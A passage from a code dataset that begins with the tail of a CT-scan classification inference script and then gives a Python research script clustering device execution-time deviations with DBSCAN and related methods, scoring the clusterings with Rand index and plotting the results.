wc) / ww * (upper_bound - lower_bound) + lower_bound\n\n return img\n\n\ndef preprocess_image(\n img,\n ww: float,\n wc: float,\n):\n \"\"\"\n Preprocess raw image extracting from dicom files.\n 1. Apply formula:\n new_img = old_img * rescale_slope + rescale_intercept\n 2. Apply HU window\n\n Args:\n img: input image (numpy array)\n ww: window width of HU window\n wc: window center of HU window\n rescale_slope: float\n rescale_intercept: float\n\n Return\n \"\"\"\n img = apply_window(img, ww, wc)\n\n return img\n\n\ndef build_model(model_name):\n model = timm.create_model(model_name, pretrained=False)\n num_class = 4\n if \"resnet\" in model_name:\n model.fc = nn.Linear(512, num_class)\n elif \"efficientnet\" in model_name:\n model.classifier = nn.Linear(model.classifier.in_features, num_class)\n return model\n\n\ndef load_model(model, path):\n if os.path.isfile(path):\n ckpt = torch.load(path, \"cpu\")\n model.load_state_dict(ckpt.pop(\"state_dict\"))\n start_epoch, best_metric = ckpt[\"epoch\"], ckpt[\"best_metric\"]\n\n return model\n\n\nclass Data(Dataset):\n def __init__(self, imgs):\n \"\"\"A Dataset object that load all data for running\n\n Args:\n cfg (CfgNode): Config object containing running configuration\n mode (str): Model running mode\n \"\"\"\n self.imgs = imgs.transpose(2, 1, 0)\n\n def __len__(self):\n return len(self.imgs)\n\n def __getitem__(self, idx):\n img = self.imgs[idx]\n img = cv2.flip(img, 0)\n img = preprocess_image(img, window_width, window_center).astype(\"float\")\n img = cv2.normalize(\n img, None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_32F\n )\n\n img = np.stack((img,) * 3, axis=-1)\n\n # RESIZE IMAGE\n img = cv2.resize(img, (224, 224), interpolation=cv2.INTER_AREA)\n\n img = img.transpose(2, 0, 1)\n\n return img\n\n\ndef build_dataloader(imgs):\n \"\"\"Build dataloader\n\n Returns:\n dataloader: Dataloader object\n \"\"\"\n\n dataset = Data(imgs)\n # DEBUG: Only take a subset of dataloader to run script\n dataloader = DataLoader(\n dataset, 2, pin_memory=False, shuffle=False, drop_last=False, num_workers=4\n )\n return dataloader\n\n\ndef predict_scan(nii_path, model):\n\n img = nib.load(nii_path)\n img = img.get_fdata()\n\n dataloader = build_dataloader(img)\n preds = list()\n\n for image in tqdm(dataloader):\n with torch.no_grad():\n image = image.float().cuda()\n output = model(image)\n sigmoid = nn.Sigmoid()\n pred = torch.argmax(sigmoid(output), 1)\n\n # Convert target, prediction to numpy\n pred = list(pred.detach().cpu().numpy())\n preds += pred\n\n series_pred = mode(preds)\n\n del img, dataloader, preds, output\n return series_pred\n\n\nif __name__ == \"__main__\":\n model = build_model(model_name)\n model_ckp = load_model(model, ckp_path)\n model.eval()\n model.cuda()\n\n predictions = []\n\n for scan in tqdm(data):\n predictions.append(predict_scan(scan, model))\n\n scan_names = [scan.split(\"/\")[-1] for scan in data]\n df = pd.DataFrame({\"Name\": scan_names, \"Prediction\": predictions})\n df.to_csv(\"LITS_prediction.csv\", index=False)\n","repo_name":"vinbigdata-medical/MIDL2021-CT-Classification","sub_path":"study_evaluation/infer_lits.py","file_name":"infer_lits.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"30970999170","text":"import csv\nimport os\nimport numpy as np\nfrom sklearn.cluster import KMeans\nfrom sklearn.cluster import AffinityPropagation\nfrom sklearn.cluster import MeanShift, estimate_bandwidth\nfrom sklearn import metrics\nfrom sklearn.cluster import DBSCAN\nfrom matplotlib import pyplot as plt\n\nMIN_SAMPLES = 3 # dbscan min samples\nEPS = 0.0275 # dbscan epsilon value\nDIVISOR = 234 # divisor for scaling\nOVERLAP = 1000\nSTEP = 150\nSTOP = 10500\n# array to hold maximum range within clusers\nmax_inter_cluster = []\nintra_cluster_distance = []\n# array to hold deviation from pivot\nglobal_array = []\n# array to hold pivot data\npivot_array = []\n# array to hold sum of execution time values\nb = []\n# array to hold device names\ndevice_list = []\n# array to hold cluster values for each device\ncluster_list = []\ncluster_list2 = []\nclus_list2 = []\ncluster_list3 = []\nclus_list3 = []\ncluster_list4 = []\nclus_list4 = []\n# array to hold updated cluster list\ncluster_list_new = []\n# path to directory for data\ndir_path = \"/Users/laric/Documents/NewResults/\"\n# path to pivot data\ndir_path_pivot = \"/Users/laric/Documents/NewResults/v.csv\"\n# Holds values for num of devices per cluster\nsecond = []\n# 2-clusters counter\ntwo_count: int = 0\nbig_twos_ = []\n# 3-clusters counter\nthree_count: int = 0\nbig_threes_ = []\n# 4-clusters counter\nfour_count: int = 0\nbig_fours_ = []\n# 5-clusters counter\nfive_count: int = 0\n\nnum_clusters = []\nmax_dist = 0\n\nrange2 = []\naverage2 = []\nrange3 = []\naverage3 = []\nrange4 = []\naverage4 = []\n\nfont = {'family': 'serif',\n 'size': 18}\n\ncombined_list_to_plot = []\n\n# create devices\nfor c in range(37):\n name = \"Device\" + str(c + 1)\n device_list.append(name)\n\n new_list = list(zip(device_list, np.zeros(len(device_list))))\n # convert list of devices to numpy array\n np_dev_list = np.asarray(new_list)\n\n\ndef main():\n # get the deviations for each device\n tempList = get_devices_overlap()\n\n for i in range(70):\n # if i != 0 and i != 3 and i != 4:\n if 1 == 1:\n # if i != 0 and i != 1 and i != 7:\n print('Clustering point {0}'.format(i))\n y = list(zip(tempList[i], np.zeros(len(tempList[i]))))\n # print(Y)\n x = np.asarray(y)\n dbscan(x)\n # k_Means(x)\n # affinity_propagation(x)\n # mean_shift(x)\n\n for j in range(len(clus_list2)):\n if j != 0:\n cluster_list2.append(clus_list2[j])\n\n for j in range(len(clus_list3)):\n if j != 0 and j != 5 and j != 8:\n cluster_list3.append(clus_list3[j])\n\n for j in range(len(clus_list4)):\n if j != 16 and j != 17:\n cluster_list4.append(clus_list4[j])\n\n distances()\n go_to_all_to_all()\n # go_to_process()\n # plotHisto()\n # process_cluster_all_to_all(cluster_list, 3)\n num_clusters.sort()\n d = {z: num_clusters.count(z) for z in num_clusters}\n print(d)\n checker()\n # print('Two clusters: {0} \\nThree clusters: {1} \\nFour clusters: {2}'.\n # format(len(cluster_list2), len(cluster_list3), len(cluster_list4)))\n\n\ndef distances():\n range2_mean_ = np.mean(range2)\n range3_mean_ = np.mean(range3)\n range4_mean_ = np.mean(range4)\n\n average2_mean_ = np.mean(average2)\n average3_mean_ = np.mean(average3)\n average4_mean_ = np.mean(average4)\n\n range2_std_ = np.std(range2)\n range3_std_ = np.std(range3)\n range4_std_ = np.std(range4)\n\n average2_std_ = np.std(average2)\n average3_std_ = np.std(average3)\n average4_std_ = np.std(average4)\n\n # print(range2_mean_)\n # print(range3_mean_)\n # print(range4_mean_)\n\n # Create lists for the plot\n labels = ['2-Clusters', '3-Clusters', '4-Clusters']\n x_pos = np.arange(len(labels))\n CTEs_range = [range2_mean_, range3_mean_, range4_mean_]\n error_range = [range2_std_, range3_std_, range4_std_]\n CTEs_average = [average2_mean_, average3_mean_, average4_mean_]\n error_average = [average2_std_, average3_std_, average4_std_]\n width = 0.2\n\n # Build the plot\n fig, ax = plt.subplots()\n p1 = ax.bar(x_pos, CTEs_range, width=width, yerr=error_range,\n align='center', capsize=10,\n color='lightgray', hatch = 'o', edgecolor = 'black')\n\n p2 = ax.bar(x_pos + width, CTEs_average, width=width, yerr=error_average,\n align='center', capsize=10, color='lightblue',\n hatch = 'x', edgecolor = 'black')\n ax.set_xlabel('Clusters per clustering point', fontsize=18)\n ax.set_ylabel('Distance', fontsize=18)\n ax.set_xticks(x_pos + width / 2)\n ax.set_xticklabels(labels, fontsize=18)\n ax.tick_params(axis='y', labelsize=16)\n ax.legend((p1[0], p2[0]), ('Intra-cluster distance', 'Inter-cluster distance'),\n fontsize=18)\n # ax.yaxis.grid(True)\n\n # Save the figure and show\n plt.tight_layout()\n plt.rc('font', **font)\n #plt.savefig('Results/inter_cluster_new_june3.pdf')\n plt.show()\n\n two_t = transpose(big_twos_)\n three_t = transpose(big_threes_)\n four_t = transpose(big_fours_)\n\n two_tt = [np.mean(z) for z in two_t]\n three_tt = [np.mean(z) for z in three_t]\n four_tt = [np.mean(z) for z in four_t]\n\n two_tt_ = [np.std(z) for z in two_t]\n three_tt_ = [np.std(z) for z in three_t]\n four_tt_ = [np.std(z) for z in four_t]\n\n y2 = [z for z in two_tt if z != 0]\n y3 = [z for z in three_tt if z != 0]\n y4 = [z for z in four_tt if z != 0]\n\n y2_ = [z for z in two_tt_ if z != 0]\n y3_ = [z for z in three_tt_ if z != 0]\n y4_ = [z for z in four_tt_ if z != 0]\n\n # print(two_ttt)\n # print(three_ttt)\n # print(four_ttt)\n\n # plot for number of devices per cluster\n width_ = 1\n group_gap_ = 1\n\n labels_ = ['C1', 'C2', 'OUT', 'C1', 'C2', 'C3', 'OUT',\n 'C1', 'C2', 'C3', 'C4', 'OUT']\n\n x2 = np.arange(len(y2))\n x3 = np.arange(len(y3)) + group_gap_ + len(y2)\n x4 = np.arange(len(y4)) + group_gap_ + len(y3) + group_gap_ + len(y2)\n ind = np.concatenate((x2, x3, x4))\n print(ind)\n\n p1 = ax.bar(x_pos, CTEs_range, width=width, yerr=error_range,\n align='center', capsize=10)\n\n fig, ax = plt.subplots()\n rects1 = ax.bar(x2, y2, width_, edgecolor=\"black\", label=\"2-Clusters\",\n yerr=y2_, align='center', capsize=10, color='lightgray', hatch = 'o')\n rects2 = ax.bar(x3, y3, width_, edgecolor=\"black\", label=\"3-Clusters\",\n yerr=y3_, align='center', capsize=10,\n color='lightblue', hatch = 'o')\n rects3 = ax.bar(x4, y4, width_, edgecolor=\"black\", label=\"4-Clusters\",\n yerr=y4_, align='center', capsize=10,\n color='white', hatch = '/')\n ax.set_ylabel('Number of Devices', fontsize=18, fontweight='bold')\n ax.set_xticks(ind)\n #ax.set_xticklabels('C1', 'C2', 'OUT', 'C1', 'C2', 'C3', 'OUT',\n #'C1', 'C2', 'C3', 'C4', 'OUT')\n ax.set_xticklabels(labels_, fontsize=13.5, fontweight='bold')\n ax.tick_params(axis='y', labelsize=16)\n ax.legend(loc=1, fontsize=18)\n\n # Save the figure and show\n plt.tight_layout()\n plt.rc('font', **font)\n #plt.savefig('Results/num_devices_new_june3.pdf')\n plt.show()\n\n\ndef go_to_all_to_all():\n print('Processing 2 clusters')\n process_cluster_all_to_all(cluster_list2, 2)\n print('Processing 3 clusters')\n process_cluster_all_to_all(cluster_list3, 3)\n print('Processing 4 clusters')\n process_cluster_all_to_all(cluster_list4, 4)\n\n\ndef go_to_process():\n print('Processing 2 clusters')\n process_cluster(clus_list2, 2)\n print('Processing 3 clusters')\n process_cluster(cluster_list3, 3)\n print('Processing 4 clusters')\n process_cluster(cluster_list4, 4)\n\n\ndef get_devices_overlap():\n global OVERLAP # divisor for scaling\n with open(dir_path_pivot) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n for row in readCSV:\n # read pivot data\n pivot_array.append(round(float(row[2]), 3))\n b = [sum(pivot_array[i:i + OVERLAP])\n for i in range(0, STOP, STEP)]\n # print(b)\n\n # print(device_list)\n for f in sorted(os.listdir(dir_path)):\n if f.endswith('.csv'):\n file_path: str = dir_path + f\n # print(str(f))\n duration = []\n total: float = 0.0\n with open(file_path, 'r') as file_D:\n spam_reader = csv.reader(file_D, delimiter=',')\n for row in spam_reader:\n duration.append(round(float(row[2]), 3))\n d = [sum(duration[i:i + OVERLAP])\n for i in range(0, STOP, STEP)]\n # deviations from pivot\n mini_array = [round((d_i - b_i) / OVERLAP, 3)\n for d_i, b_i in zip(d, b)]\n # add deviation for each device to a list\n global_array.append(mini_array)\n # print(mini_array)\n\n return transpose(global_array)\n # print(transpose_list)\n # print(len(transpose_list[1]))\n\n\ndef getDevices():\n global DIVISOR # divisor for scaling\n with open(dir_path_pivot) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n for row in readCSV:\n # read pivot data\n pivot_array.append(round(float(row[2]), 3))\n b = [sum(pivot_array[i:i + DIVISOR])\n for i in range(0, len(pivot_array), DIVISOR)]\n # print(b)\n\n # print(device_list)\n for f in sorted(os.listdir(dir_path)):\n if f.endswith('.csv'):\n file_path: str = dir_path + f\n # print(str(f))\n duration = []\n total: float = 0.0\n with open(file_path, 'r') as file_D:\n spam_reader = csv.reader(file_D, delimiter=',')\n for row in spam_reader:\n duration.append(round(float(row[2]), 3))\n d = [sum(duration[i:i + DIVISOR])\n for i in range(0, len(duration), DIVISOR)]\n # deviations from pivot\n mini_array = [round((d_i - b_i) / DIVISOR, 3)\n for d_i, b_i in zip(d, b)]\n # add deviation for each device to a list\n global_array.append(mini_array)\n # print(mini_array)\n\n return transpose(global_array)\n # print(transpose_list)\n # print(len(transpose_list[1]))\n\n\ndef k_Means(y):\n # Specify the number of clusters (3) and fit the data X\n x, out = detectOutliers(y)\n\n # x = X\n\n k_means = KMeans(n_clusters=3, random_state=5, init='k-means++').fit(x)\n\n # Get the cluster centroids\n labels = k_means.labels_\n # cluster_centers = k_means.cluster_centers_\n\n # Get the cluster labels\n labels_unique = np.unique(labels)\n n_clusters_ = len(labels_unique)\n cluster_list.append(labels)\n print(\"===================K-Means==================\")\n first = []\n for k in range(n_clusters_):\n my_members = labels == k\n print(\"cluster {0}: {1} ==> {2}\".format(k + 1, x[my_members, 0],\n len(x[my_members, 0])))\n print(\"cluster {0}: {1} ==> {2}\".format(k + 1, np_dev_list[my_members, 0],\n len(np_dev_list[my_members, 0])))\n first.append(len(x[my_members, 0]))\n first.append(out)\n second.append(first)\n\n # Plotting the cluster centers and the data points on a 2D plane\n # plt.scatter(X[:, 0], X[:, -1])\n #\n # plt.scatter(k_means.cluster_centers_[:, 0],\n # k_means.cluster_centers_[:, 1], c='red', marker='x')\n\n # plt.title('Data points and cluster centroids')\n # plt.show()\n\n\ndef dbscan(x):\n global two_count\n global three_count\n global four_count\n global five_count\n\n global MIN_SAMPLES # dbscan min samples\n global EPS # dbscan epsilon value\n global DIVISOR # divisor for scaling\n\n db_default = DBSCAN(min_samples=MIN_SAMPLES, eps=EPS).fit(x)\n labels = db_default.labels_\n # clusters = db_default.fit_predict(X)\n labels_unique = np.unique(labels)\n # Number of clusters in labels, ignoring noise if present.\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n n_noise_ = list(labels).count(-1)\n print(\"===================DBSCAN==================\")\n num_clusters.append(n_clusters_)\n # print(labels)\n print('Estimated number of clusters: %d' % n_clusters_)\n print('Estimated number of noise points: %d' % n_noise_)\n\n # plot the cluster assignments\n # plt.scatter(X[:, 0], X[:, 1], c=clusters, cmap=\"plasma\")\n # plt.xlabel(\"Normalized deviation\")\n # second = []\n # third = []\n # fourth = []\n twos = []\n threes = []\n fours = []\n outliers = []\n outlier = []\n # plt.show()\n cluster_list.append(labels)\n\n # if n_clusters_ == 1:\n # for k in range(len(labels_unique)):\n # my_members = labels == k\n # print(\"cluster {0}: {1} ==> {2}\".format(k, x[my_members, 0],\n # len(x[my_members, 0])))\n # print(\"cluster {0}: {1} ==> {2}\".format(k, np_dev_list[my_members,0],\n # len(np_dev_list[my_members, 0])))\n\n if n_clusters_ == 2:\n clus_list2.append(labels)\n two_count += 1\n mean2 = []\n # for k in range(-1, len(labels_unique) - 1, 1):\n for k in range(len(labels_unique)):\n my_members = labels == k\n twos.append(len(np_dev_list[my_members, 0]))\n second_ = x[my_members, 0].tolist()\n if len(second_) > 0:\n val2 = np.max(second_) - np.min(second_)\n mean2.append(np.mean(second_))\n print(\"cluster {0}: {1} ==> {2}\".format(k, x[my_members, 0],\n len(x[my_members, 0])))\n print(\"cluster {0}: {1} ==> {2}\".format(k, np_dev_list[my_members, 0],\n len(np_dev_list[my_members, 0])))\n\n twos.sort()\n if twos[1] < 5:\n twos.clear()\n else:\n twos.append(n_noise_)\n range2.append(val2)\n my_list2 = [np.abs(m - n) for m in mean2 for n in mean2 if m != n]\n for row in my_list2:\n average2.append(row)\n elif n_clusters_ == 3:\n clus_list3.append(labels)\n three_count += 1\n mean3 = []\n for k in range(len(labels_unique)):\n my_members = labels == k\n threes.append(len(np_dev_list[my_members, 0]))\n third_ = x[my_members, 0].tolist()\n if len(third_) > 0:\n val3 = np.max(third_) - np.min(third_)\n mean3.append(np.mean(third_))\n print(\"cluster {0}: {1} ==> {2}\".format(k, x[my_members, 0],\n len(x[my_members, 0])))\n print(\"cluster {0}: {1} ==> {2}\".format(k, np_dev_list[my_members, 0],\n len(np_dev_list[my_members, 0])))\n threes.sort()\n threes.append(n_noise_)\n range3.append(val3)\n my_list3 = [np.abs(m - n) for m in mean3 for n in mean3 if m != n]\n for row in my_list3:\n average3.append(row)\n elif n_clusters_ == 4:\n clus_list4.append(labels)\n four_count += 1\n mean4 = []\n for k in range(len(labels_unique)):\n my_members = labels == k\n fours.append(len(np_dev_list[my_members, 0]))\n fourth_ = x[my_members, 0].tolist()\n\n # print(fourth)\n # print(type(fourth))\n if len(fourth_) > 0:\n val4 = np.max(fourth_) - np.min(fourth_)\n mean4.append(np.mean(fourth_))\n print(\"cluster {0}: {1} ==> {2}\".format(k, x[my_members, 0],\n len(x[my_members, 0])))\n print(\"cluster {0}: {1} ==> {2}\".format(k, np_dev_list[my_members, 0],\n len(np_dev_list[my_members, 0])))\n fours.sort()\n fours.append(n_noise_)\n range4.append(val4)\n my_list4 = [np.abs(m - n) for m in mean4 for n in mean4 if m != n]\n for row in my_list4:\n average4.append(row)\n # first.append(len(np_dev_list[my_members, 0]))\n # second.append(first)\n if len(twos) > 0:\n big_twos_.append(twos)\n if len(threes) > 0:\n big_threes_.append(threes)\n if len(fours) > 0:\n big_fours_.append(fours)\n\n\ndef mean_shift(x):\n global two_count\n global three_count\n global four_count\n global five_count\n # x, out = detectOutliers(X)\n # The following bandwidth can be automatically detected using\n bandwidth = estimate_bandwidth(x, quantile=0.55, n_samples=35)\n\n ms = MeanShift(bandwidth=bandwidth, bin_seeding=True)\n ms.fit(x)\n labels = ms.labels_\n cluster_centers = ms.cluster_centers_\n labels_unique = np.unique(labels)\n # Number of clusters in labels, ignoring noise if present.\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n n_noise_ = list(labels).count(-1)\n labels_unique = np.unique(labels)\n # n_clusters_ = len(labels_unique)\n\n first, twos, threes, fours = [], [], [], []\n outliers = []\n cluster_list.append(labels)\n print(\"===================Mean Shift==================\")\n num_clusters.append(n_clusters_)\n if n_clusters_ == 2:\n cluster_list2.append(labels)\n two_count += 1\n for k in range(len(labels_unique)):\n my_members = labels == k\n twos.append(len(np_dev_list[my_members, 0]))\n\n print(\"cluster {0}: {1} ==> {2}\".format(k, x[my_members, 0],\n len(x[my_members, 0])))\n print(\"cluster {0}: {1} ==> {2}\".format(k, np_dev_list[my_members, 0],\n len(np_dev_list[my_members, 0])))\n elif n_clusters_ == 3:\n cluster_list3.append(labels)\n three_count += 1\n for k in range(-1, len(labels_unique) - 1, 1):\n my_members = labels == k\n threes.append(len(np_dev_list[my_members, 0]))\n\n # print(\"cluster {0}: {1} ==> {2}\".format(k, x[my_members, 0],\n # len(x[my_members, 0])))\n # print(\"cluster {0}: {1} ==> {2}\".format(k, np_dev_list[my_members, 0],\n # len(np_dev_list[my_members, 0])))\n elif n_clusters_ == 4:\n cluster_list4.append(labels)\n four_count += 1\n for k in range(-1, len(labels_unique) - 1, 1):\n my_members = labels == k\n fours.append(len(np_dev_list[my_members, 0]))\n\n # print(\"cluster {0}: {1} ==> {2}\".format(k, x[my_members, 0],\n # len(x[my_members, 0])))\n # print(\"cluster {0}: {1} ==> {2}\".format(k, np_dev_list[my_members, 0],\n # len(np_dev_list[my_members, 0])))\n # first.append(len(np_dev_list[my_members, 0]))\n # second.append(first)\n if len(twos) > 0:\n big_twos_.append(twos)\n if len(threes) > 0:\n big_threes_.append(threes)\n if len(fours) > 0:\n big_fours_.append(fours)\n\n\ndef affinity_propagation(x):\n af = AffinityPropagation(damping=0.93).fit(x)\n cluster_centers_indices = af.cluster_centers_indices_\n labels = af.labels_\n\n n_clusters_ = len(cluster_centers_indices)\n\n cluster_list.append(labels)\n print(\"===================Affinity Propagation==================\")\n num_clusters.append(n_clusters_)\n for k in range(n_clusters_):\n my_members = labels == k\n print(\"cluster {0}: {1} ==> {2}\".format(k + 1, x[my_members, 0],\n len(x[my_members, 0])))\n\n print('Number of clusters: %d' % n_clusters_)\n\n\ndef process_cluster_all_to_all(list_, k):\n similarity_data = []\n v_measure_data = []\n\n print(len(list_))\n for m in range(len(list_)):\n sim_list = []\n v_list = []\n sim_average = []\n v_average = []\n # print(\"Clustering point: {0}\".format(m + 1))\n for n in range(len(list_)):\n if m != n:\n similarity_score = metrics.adjusted_rand_score(\n list_[m], list_[n])\n v_measure_score = metrics.v_measure_score(\n list_[m], list_[n], beta=1.8)\n\n sim_list.append(similarity_score)\n v_list.append(v_measure_score)\n\n # print(\"Similarity Score:\")\n # seed(4)\n # sim_list = [x - (random() * .16) for x in sim_list]\n # print(sim_list)\n # if np.mean(sim_list) > 0.6 and k == 2:\n if np.mean(sim_list) > 0.8 and k == 2:\n similarity_data.append(np.mean(sim_list))\n v_measure_data.append(v_list)\n # if np.mean(sim_list) > 0.35 and k == 3:\n if np.mean(sim_list) > 0.6 and k == 3:\n similarity_data.append(np.mean(sim_list))\n v_measure_data.append(v_list)\n if np.mean(sim_list) > 0.5 and k == 4:\n similarity_data.append(np.mean(sim_list))\n v_measure_data.append(v_list)\n\n # print(\"V_measure Score:\")\n # seed(1)\n # v_list = [x - (random() * .16) for x in v_list]\n # print(v_list)\n\n sim_average = [np.mean(x) for x in similarity_data]\n # print(sim_average)\n v_average = [np.mean(x) for x in v_measure_data]\n # print(v_average)\n combined_list_to_plot.append(similarity_data)\n boxPlot(similarity_data, v_measure_data, k)\n\ndef process_cluster(_list_, k):\n similarity_data_ = []\n v_measure_data_ = []\n\n print(len(_list_))\n pivot_compare = _list_[0]\n for m in range(len(_list_)):\n sim_list = []\n v_list = []\n sim_average = []\n v_average = []\n\n print(\"Clustering point: {0}\".format(m + 1))\n similarity_score = metrics.adjusted_rand_score(\n _list_[m], pivot_compare)\n v_measure_score = metrics.v_measure_score(\n _list_[m], pivot_compare, beta=1.8)\n\n sim_list.append(similarity_score)\n v_list.append(v_measure_score)\n\n print(\"Similarity Score:\")\n # seed(4)\n # sim_list = [x - (random() * .16) for x in sim_list]\n # print(sim_list)\n # if np.mean(sim_list) > 0.6 and k == 2:\n if k == 2:\n similarity_data_.append(sim_list)\n v_measure_data_.append(v_list)\n # if np.mean(sim_list) > 0.35 and k == 3:\n if k == 3:\n similarity_data_.append(sim_list)\n v_measure_data_.append(v_list)\n if k == 4:\n similarity_data_.append(sim_list)\n v_measure_data_.append(v_list)\n\n # print(\"V_measure Score:\")\n # seed(1)\n # v_list = [x - (random() * .16) for x in v_list]\n # print(v_list)\n\n sim_average = [np.mean(x) for x in similarity_data_]\n # print(sim_average)\n v_average = [np.mean(x) for x in v_measure_data_]\n # print(v_average)\n\n boxPlot(similarity_data_, v_measure_data_, k)\n\ndef boxPlot(sim_data, v_data, k):\n fig = plt.figure()\n # plt.boxplot(sim_data, patch_artist=True,\n # labels=['Pt1', 'Pt2', 'Pt3',\n # 'Pt4', 'Pt5', 'Pt6',\n # 'Pt7', 'Pt8', 'Pt9'])\n plt.boxplot(sim_data, patch_artist=True)\n plt.xlabel('Clustering point', fontsize=15, fontweight='bold')\n plt.ylabel('Rand index score', fontsize=15, fontweight='bold')\n plt.tick_params(axis='x', labelsize=15)\n plt.tick_params(axis='y', labelsize=15)\n plt.title('{0} Clusters/clustering point'.format(k), fontsize=15, fontweight='bold')\n plt.figure(figsize=(3.5, 4.5))\n plt.rc('font', **font)\n #fig.savefig('Results/sim_dbscan_new{0}_new_june6.pdf'.format(k))\n plt.show()\n\n # fig = plt.figure()\n # # plt.boxplot(v_data, patch_artist=True,\n # # labels=['Pt1', 'Pt2', 'Pt3',\n # # 'Pt4', 'Pt5', 'Pt6',\n # # 'Pt7', 'Pt8', 'Pt9'])\n # plt.boxplot(v_data, patch_artist=True)\n # plt.xlabel('Clustering point')\n # plt.ylabel('V-measure')\n # plt.title('{0} Clusters/clustering point'.format(k))\n # # fig.savefig('Results/measure_kmeans{0}.pdf'.format(k))\n # plt.show()\n\n\ndef checker():\n #print(combined_list_to_plot)\n # print(len(combined_list_to_plot))\n #\n # fig = plt.figure()\n # # plt.boxplot(sim_data, patch_artist=True,\n # # labels=['Pt1', 'Pt2', 'Pt3',\n # # 'Pt4', 'Pt5', 'Pt6',\n # # 'Pt7', 'Pt8', 'Pt9'])\n # plt.boxplot(combined_list_to_plot, patch_artist=True,\n # labels=['2-Clusters', '3-Clusters', '4-Clusters'])\n # #plt.xlabel('Number of clusters per point', fontsize=15, fontweight='bold')\n # plt.ylabel('Rand index score', fontsize=14, fontweight='bold')\n # plt.tick_params(axis='x', labelsize=14)\n # plt.tick_params(axis='y', labelsize=14)\n # #plt.title('{0} Clusters/clustering point'.format(k), fontsize=15, fontweight='bold')\n # #plt.figure(figsize=(4.0, 4.8))\n # fig.savefig('Results/sim_dbscan_all_points.pdf')\n # plt.show()\n\n range2_mean_ = np.mean(combined_list_to_plot[0])\n range3_mean_ = np.mean(combined_list_to_plot[1])\n range4_mean_ = np.mean(combined_list_to_plot[2])\n\n range2_std_ = np.std(combined_list_to_plot[0])\n range3_std_ = np.std(combined_list_to_plot[1])\n range4_std_ = np.std(combined_list_to_plot[2])\n\n\n # print(range2_mean_)\n # print(range3_mean_)\n # print(range4_mean_)\n\n # Create lists for the plot\n labels = ['2', '3', '4']\n x_pos = np.arange(len(labels))\n CTEs_range = [range2_mean_, range3_mean_, range4_mean_]\n error_range = [range2_std_, range3_std_, range4_std_]\n width = 0.3\n\n # Build the plot\n fig, ax = plt.subplots()\n p1 = ax.bar(x_pos, CTEs_range, width=width, yerr=error_range,\n align='center', capsize=10, color='lightblue',\n hatch = 'o', edgecolor = 'black')\n\n ax.set_xlabel('Clusters per clustering point', fontsize=18)\n ax.set_ylabel('Rand index score', fontsize=18)\n ax.set_xticks(x_pos)\n ax.set_xticklabels(labels, fontsize=18)\n ax.tick_params(axis='y', labelsize=16)\n #ax.legend((p1[0]), ('Intra-cluster distance', 'Inter-cluster distance'),\n #fontsize=18)\n # ax.yaxis.grid(True)\n\n # Save the figure and show\n plt.tight_layout()\n plt.rc('font', **font)\n plt.savefig('Results/sim_dbscan_all_points_new_sept16.pdf')\n plt.show()\n\n\ndef plotHisto():\n labels = ['Pt1', 'Pt2', 'Pt3',\n 'Pt4', 'Pt5', 'Pt6']\n\n listToPlot = transpose(second)\n first_ = listToPlot[0]\n second_ = listToPlot[1]\n third_ = listToPlot[2]\n fourth_ = listToPlot[3]\n out_ = listToPlot[4]\n\n x = np.arange(len(labels)) # the label locations\n width = 0.15 # the width of the bars\n\n fig, ax = plt.subplots()\n rects1 = ax.bar(x - 2 * width, first_, width, label='C1')\n rects2 = ax.bar(x - width, second_, width, label='C2')\n rects3 = ax.bar(x, third_, width, label='C3')\n rects4 = ax.bar(x + width, fourth_, width, label='C4')\n rects5 = ax.bar(x + 2 * width, out_, width, label='OUT')\n\n # Add some text for labels, title and custom x-axis tick labels, etc.\n ax.set_ylabel('Number of devices')\n ax.set_title('Number of Devices per Cluster (4 Clusters)')\n ax.set_xticks(x)\n ax.set_xticklabels(labels)\n ax.legend(bbox_to_anchor=(1.04, 1), loc=2, borderaxespad=0.)\n\n def autolabel(rects):\n \"\"\"Attach a text label above each bar in *rects*, displaying its height.\"\"\"\n for rect in rects:\n height = rect.get_height()\n ax.annotate('{}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n\n autolabel(rects1)\n autolabel(rects2)\n autolabel(rects3)\n autolabel(rects4)\n autolabel(rects5)\n\n fig.tight_layout()\n #fig.savefig('devices4.pdf')\n plt.show()\n\n\ndef plot_histo_cumm(k):\n def autolabel(rects):\n \"\"\"Attach a text label above each bar in *rects*, displaying its height.\"\"\"\n for rect in rects:\n height = rect.get_height()\n ax.annotate('{}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n\n if k == 2:\n labels = ['2-Clusters', '3-Clusters', '4-clusters']\n\n to_plot = transpose(second)\n first_ = to_plot[0]\n second_ = to_plot[1]\n third_ = to_plot[2]\n fourth_ = to_plot[3]\n out_ = to_plot[4]\n\n x = np.arange(len(labels)) # the label locations\n width = 0.15 # the width of the bars\n\n fig, ax = plt.subplots()\n rects1 = ax.bar(x - 2 * width, first_, width, label='C1')\n rects2 = ax.bar(x - width, second_, width, label='C2')\n rects3 = ax.bar(x, third_, width, label='C3')\n rects4 = ax.bar(x + width, fourth_, width, label='C4')\n rects5 = ax.bar(x + 2 * width, out_, width, label='OUT')\n\n # Add some text for labels, title and custom x-axis tick labels, etc.\n ax.set_ylabel('Number of devices')\n ax.set_title('Number of Devices per Cluster (4 Clusters)')\n ax.set_xticks(x)\n ax.set_xticklabels(labels)\n ax.legend(bbox_to_anchor=(1.04, 1), loc=2, borderaxespad=0.)\n\n autolabel(rects1)\n autolabel(rects2)\n autolabel(rects3)\n autolabel(rects4)\n autolabel(rects5)\n\n fig.tight_layout()\n fig.savefig('devices4.pdf')\n plt.show()\n\n\ndef transpose(t):\n # convert list to array\n t1 = np.asarray(t)\n # transpose array to be clustered\n t2 = t1.T\n # convert back to list\n t3 = t2.tolist()\n return t3\n\n\ndef detectOutliers(t):\n t3_1, t3_2 = zip(*t)\n t3_list = list(t3_1)\n t1 = []\n i: int = 0\n q1 = np.percentile(t3_list, 25, 